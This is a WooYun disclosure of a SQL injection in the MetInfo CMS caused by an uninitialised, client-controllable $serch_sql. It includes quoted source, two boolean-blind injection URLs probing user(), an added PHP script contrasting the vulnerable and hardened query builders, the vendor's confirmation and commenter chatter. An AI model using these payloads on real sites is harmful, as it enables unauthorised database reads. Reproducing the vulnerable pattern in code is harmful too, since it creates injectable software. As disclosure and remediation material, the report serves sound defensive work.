Defect ID: WooYun-2015-0125648
Title: An injection in the latest MetInfo release, plus a minor issue
Vendor: MetInfo
Author: 玉林嘎
Submitted: 2015-07-09 15:24
Published: 2015-10-10 13:10
Type: SQL injection
Severity: High
Self-assessed Rank: 15
Status: Confirmed by vendor
Tags: none
2015-07-09: Details sent to the vendor, awaiting vendor handling
2015-07-12: Vendor confirmed; details visible to the vendor only
2015-07-15: Details opened to third-party security partners (NSFOCUS, Tangchao Security, Wusheng Information)
2015-09-05: Details opened to core white hats and domain experts
2015-09-15: Details opened to regular white hats
2015-09-25: Details opened to intern white hats
2015-10-10: Details opened to the public
As per the title.
Latest MetInfo release. 1. Injection vulnerability. File: /include/global/listmod.php. Key code excerpt:
require_once substr(dirname(__FILE__), 0, -6).'common.inc.php';
require_once '../include/global/pseudo.php';
if($dbname!=$met_download&&$dbname!=$met_img&&$dbname!=$met_news&&$dbname!=$met_product){okinfo('../404.html');exit();}
if($class_list[$class1]['module']>=100||($class1==0&&$class2==0&&$class3==0)||$class1==10001){
    if($search=="search"){
        $search_module=$imgproduct=='product'?3:5;
        if($searchtype)$search_module=$searchtype;
        $query="select * from $met_column where module='$search_module' and (classtype=1 or releclass!=0) and lang='$lang' order by no_order ASC,id ASC";
        $search_coloumn=$db->get_all($query);
        $class1=$search_coloumn[0]['id'];
    }else{
        if($imgproduct){
            $ipmd = $imgproduct=='product'?100:101;
            if($imgproduct=='product'){$class1=$productlistid;}
            else{$class1=$imglistid;}
        }
    }
}
else{
    if(!$class1){
        if(!$class2){$class2=$class_list[$class3]['bigclass'];}
        $class1=$class_list[$class2]['bigclass'];
    }
}
if($met_member_use){
    $classaccess=$class3?$class3:($class2?$class2:$class1);
    $classaccess= $db->get_one("SELECT * FROM $met_column WHERE id='$classaccess'");
    $metaccess=$classaccess['access'];
}
require_once '../include/head.php';
if($class1){if(!is_array($class_list[$class1]))okinfo('../404.html');}
$pseudos=$db->get_one("select * from $met_column where filename='$class2' and lang='$lang'");
if($pseudos){
    $class2=$pseudos[id];
}
......
$class1_info=$class_list[$class1]['releclass']?$class_list[$class_list[$class1]['releclass']]:$class_list[$class1];
$class2_info=$class_list[$class1]['releclass']?$class_list[$class1]:$class_list[$class2];
$class3_info=$class_list[$class1]['releclass']?$class_list[$class2]:$class_list[$class3];
if(!is_array($class1_info))okinfo('../404.html');
$class1sql=" class1='$class1' ";
if($class1&&!$class2&&!$class3){
    foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){
        if($val['releclass']==$class1){
            $class1re.=" or class1='$val[id]' ";
        }
    }
    if($class1re){
        $class1sql='('.$class1sql.$class1re.')';
    }
}
if($imgproduct){
    $ipcom = $imgproduct=='product'?$productcom:$imgcom;
    // First write to $serch_sql in this branch is an append, not an assignment
    $serch_sql .=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1')";
    if($ipcom=='com')$serch_sql .= " and com_ok=1";
    if($class1 && $class_list[$class1]['module']<>$ipmd&&$class1!=10001){
        $serch_sql .= ' and (('.$class1sql;
    }else{
        $serch_sql .= ' and ((1=1';
    }
}else{
    // The non-$imgproduct branch assigns with =, so it is not affected
    $serch_sql=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1') and (( $class1sql ";
}
if($imgproduct){
    $ipcom = $imgproduct=='product'?$productcom:$imgcom;
    $serch_sql .=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1')";
    if($ipcom=='com')$serch_sql .= " and com_ok=1";
    if($class1 && $class_list[$class1]['module']<>$ipmd&&$class1!=10001){
        $serch_sql .= ' and (('.$class1sql;
    }else{
        $serch_sql .= ' and ((1=1';
    }
}else{
    $serch_sql=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1') and (( $class1sql ";
}
$serch_sql is not declared anywhere before this block, nor in the files that include it, so its first assignment is the one below. But inside the if($imgproduct) branch that "assignment" is a .= append, so whatever $serch_sql already holds becomes the prefix of the where-clause, and since MetInfo turns request parameters into PHP variables, the client gets to supply that value:
if($imgproduct){
    $ipcom = $imgproduct=='product'?$productcom:$imgcom;
    $serch_sql .=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1')";  // append to a never-initialised variable
As a result $serch_sql is directly attacker-controlled. It then goes straight into the query here:
$total_count = $db->counter($dbname, "$serch_sql", "*");
Before reaching that query, the conditions above it have to hold, so this file must be reached through a caller that sets $imgproduct, i.e. /img/img.php. Proof: print $serch_sql right after the append and look closely; it can be controlled. The two requests below differ only in the ASCII value compared against the first character of user() (114 = 'r', 115 = 's'), so a difference in the responses is the boolean oracle:
**.**.**.**/metinfo/img/img.php?class1=1&serch_sql=%201=if%28ascii%28substr%28user%28%29,1,1%29%29=114,1,2%29%23
**.**.**.**/metinfo/img/img.php?class1=1&serch_sql=%201=if%28ascii%28substr%28user%28%29,1,1%29%29=115,1,2%29%23
2. Another minor issue: /wap/module.php
switch($module){
    default:
        $temp = 'index';
        $waptitle=$wap_title;
        break;
    case 1:
        $temp = 'show';
        $dbname = $met_column;
        // no $list_num assignment in this case
        break;
    case 2:
        $temp = 'news';
        $dbname = $met_news;
        $list_num = $wap_news_list;
        break;
    case 3:
        $temp = 'product';
        $dbname = $met_product;
        $list_num = $wap_product_list;
        break;
    case 4:
        $temp = 'download';
        $dbname = $met_download;
        $list_num = $wap_download_list;
        break;
    case 5:
        $temp = 'img';
        $dbname = $met_img;
        $list_num = $wap_img_list;
        break;
    case 6:
        $temp = 'job';
        $dbname = $met_job;
        $list_num = $wap_job_list;
        break;
}
if($temp != 'index'){
    $ctitle = $db->get_one("select * from $dbname where lang='$lang' and id = '$id'");
    if(!$id){
        $clname = $class1?'class1':($class2?'class2':'class3');
        $classwap = $class1?$class1:($class2?$class2:$class3);
        $qtext = $met_wap_ok?"and wap_ok='1'":'';
        $serch_sql=" where lang='$lang' and $clname = '$classwap' $qtext";
        if($module==6)$serch_sql=" where lang='$lang' $qtext";
        $order_sql=$class3?list_order($class_list[$class3]['list_order']):($class2?list_order($class_list[$class2]['list_order']):list_order($class_list[$class1]['list_order']));
        if($module==6)$order_sql='order by no_order desc,addtime desc';
        $total_count = $db->counter($dbname, "$serch_sql", "*");
        $totaltop_count = $db->counter($dbname, "$serch_sql and top_ok='1'", "*");
        require_once '../include/pager.class.php';
        $page = (int)$page;
        if($page_input){$page=$page_input;}
        $rowset = new Pager($total_count,$list_num,$page);
        $from_record = $rowset->_offset();
        $page = $page?$page:1;
        if($module==6){
            $query = "SELECT * FROM $dbname $serch_sql and access='0' $order_sql LIMIT $from_record, $list_num";
        }else{
            // $list_num is interpolated unquoted into LIMIT
            $query = "SELECT * FROM $dbname $serch_sql and top_ok='1' and access='0' and (recycle='0' or recycle='-1') $order_sql LIMIT $from_record, $list_num";
        }
The $list_num parameter: if execution enters case 1 it is never set, so the client can control it.
I initially took this for a LIMIT injection,
but that table ($met_column) simply does not have those columns (top_ok, access, recycle), so the query fails before the LIMIT is ever evaluated...
Filtered.
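The following PHP script is an added example for this report; it is not MetInfo's code and not the author's. It reproduces, side by side, the pattern behind both findings above: request parameters become PHP variables (extract() here stands in for the way MetInfo's common.inc.php imports $_GET/$_POST), and the script then builds SQL from a variable it never initialised, so the client's value becomes the prefix of $serch_sql in listmod.php and the unquoted LIMIT count in /wap/module.php. The request array is constructed; the table and column names follow the excerpts; the injected fragment carries a leading "where" (an assumption of this example, so that the printed statement is well-formed), and the hardened builder uses PDO-style "?" placeholders, which is the example's choice rather than MetInfo's API.

```php
<?php
// Added example for this report (not MetInfo's code). It reproduces the pattern
// behind both findings: request parameters become PHP variables (MetInfo's
// common.inc.php imports $_GET/$_POST that way), and the script then builds SQL
// from a variable it never initialised, so the client's value becomes its prefix.
// Table/column names follow the report's excerpts; everything else is constructed.

// Constructed request, standing in for /img/img.php?class1=1&serch_sql=...
// The fragment carries a leading "where" so the statement printed below is
// well-formed; the if() is the same boolean oracle used in the report's URLs.
$request = [
    'class1'    => '1',
    'serch_sql' => " where 1=if(ascii(substr(user(),1,1))=114,1,2)#",
    'list_num'  => '20 /* attacker-chosen, lands unquoted in LIMIT */',
];

/**
 * Vulnerable shape. extract() stands in for the framework's register_globals-style
 * import, so $serch_sql and $list_num exist before the script "first" assigns them.
 */
function build_queries_vulnerable(array $req, string $lang = 'cn'): array
{
    extract($req);                          // defines $class1, $serch_sql, $list_num, ...
    $class1sql = " class1='$class1' ";

    // listmod.php: the first write is a .= on a variable the client already filled,
    // and the "#" in that value comments out everything appended after it.
    $serch_sql .= " where lang='$lang' and (recycle='0' or recycle='-1')";
    $serch_sql .= ' and ((' . $class1sql . '))';
    $count = "SELECT COUNT(*) AS num FROM met_img $serch_sql";

    // wap/module.php: its where-clause is a plain assignment, so only $list_num
    // (never set under case 1) is left to the client.
    $wap_sql = " where lang='$lang' and class1='$class1'";
    $list    = "SELECT * FROM met_column $wap_sql LIMIT 0, $list_num";

    return [$count, $list];
}

/**
 * Hardened shape: read only the inputs the page needs, coerce them to the type the
 * query expects, initialise every fragment locally, and bind strings as parameters.
 * Returns the SQL text plus the values to bind (PDO-style "?" placeholders).
 */
function build_queries_fixed(array $req, string $lang = 'cn'): array
{
    $class1   = (int)($req['class1'] ?? 0);
    $list_num = max(1, min(100, (int)($req['list_num'] ?? 20)));   // LIMIT needs an int
    $serch_sql = " WHERE lang = ? AND recycle IN ('0', '-1') AND class1 = ?"; // never read from $req
    $params    = [$lang, $class1];

    $count = "SELECT COUNT(*) AS num FROM met_img$serch_sql";
    $list  = "SELECT * FROM met_column$serch_sql LIMIT 0, $list_num";
    return [$count, $list, $params];
}

[$vc, $vl] = build_queries_vulnerable($request);
echo "vulnerable count: $vc\n";   // client fragment is the prefix; the real where-clause is commented out
echo "vulnerable list:  $vl\n";   // "20 /* ... */" reaches LIMIT unchanged
[$fc, $fl, $params] = build_queries_fixed($request);
echo "fixed count:      $fc\n";
echo "fixed list:       $fl\n";
echo "bound params:     " . json_encode($params) . "\n";
```

Run it with php on the command line and compare the two pairs of statements. The fix is not escaping: initialising $serch_sql locally means no request parameter can seed it, casting $list_num to an int means LIMIT can only ever receive a number, and binding lang/class1 as parameters keeps the remaining string values out of the SQL text altogether.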
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-07-12 13:08
Vendor reply: It is a system vulnerability and will be fixed in a later version.
Latest status: none yet
Awesome.
Looks like you got hold of the source and started auditing. I got a copy of the 5.2 source today and was just about to dig into it...
That is the turnaround you get for a general-purpose vuln, touching!
2K?
@牛肉包子 Yep.
Master, take me along.
Yu, take me along?
@玉林嘎 take me along ⊙﹏⊙
Please take me along.
http://wooyun.org/bugs/wooyun-2010-0119166 is exactly the same as this one.
@menmen519 After yours was published I noticed a near-identical issue; only the entry point differs.
@玉林嘎 Oh, heh, 2k in the pocket either way, haha.